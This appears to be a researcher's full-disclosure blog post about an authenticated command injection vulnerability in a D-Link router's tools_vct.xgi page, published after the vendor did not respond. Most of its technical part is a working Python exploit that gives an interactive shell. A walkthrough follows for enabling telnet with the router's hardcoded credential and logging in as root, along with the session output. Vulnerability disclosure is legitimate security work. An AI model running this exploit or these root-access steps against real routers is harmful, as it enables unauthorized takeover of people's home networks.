In February I contacted D-Link Chile, then D-Link Latin America but I never received an official answer for my report. After eight months, I will publish the details of this vulnerability (I tried responsible disclosure but D-Link didn't take in account my reports). It's a simple command injection vulnerability that requires administration credentials. For more details you can check my last post about this issue. The hardware version is Bx and the affected firmware
- Version 2.0 (default) (it's vulnerable to HNAP flaw too (tested by me), so I managed to get admin credentials)
- Version 2.05 (current)
The vulnerable pages are:
The exploit I use, after authentication in web browser, is the following:
#!/usr/bin/env python3 # coding=utf8 # csalazar at spect dot cl import http.cookiejar import urllib.request, urllib.error import sys if len(sys.argv) != 2: print('Usage: python3 %s router_ip' % sys.argv) sys.exit(0) url = 'http://'+sys.argv+'/tools_vct.xgi?set/runtime/switch/||%s||=1' cj = http.cookiejar.CookieJar() opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) while True: command = input('$ ') try: r = opener.open(url % (command)) except urllib.error.HTTPError as e: output = e.info()._payload print(output[:-136])
A short video with the exploit in action is here:
Getting root access
Telnet is disabled by default, but it can be enabled. The steps are: first, find user name and password used by telnet service, and then, start telnet daemon.
$ cat /etc/scripts/misc/telnetd.sh #!/bin/sh image_sign=`cat /etc/config/image_sign` TELNETD=`rgdb -g /sys/telnetd` if [ "$TELNETD" = "true" ]; then echo "Start telnetd ..." > /dev/console if [ -f "/usr/sbin/login" ]; then lf=`rgdb -i -g /runtime/layout/lanif` telnetd -l "/usr/sbin/login" -u Alphanetworks:$image_sign -i $lf & else telnetd & fi fi $ cat /etc/config/image_sign wrgn23_dlwbr_dir600b $ sh /etc/scripts/misc/telnetd.sh
After that, you can access by Telnet with root privileges!
csalazar:~/spect/security/research/dlink$ telnet 192.168.0.1 Trying 192.168.0.1... Connected to 192.168.0.1. Escape character is '^]'. login: Alphanetworks Password: wrgn23_dlwbr_dir600b BusyBox v1.00 (2010.11.23-03:23+0000) Built-in shell (msh) Enter 'help' for a list of built-in commands.
Fixing the problem
No solution is provided by D-Link. The only solution is to install DD-WRT in this router.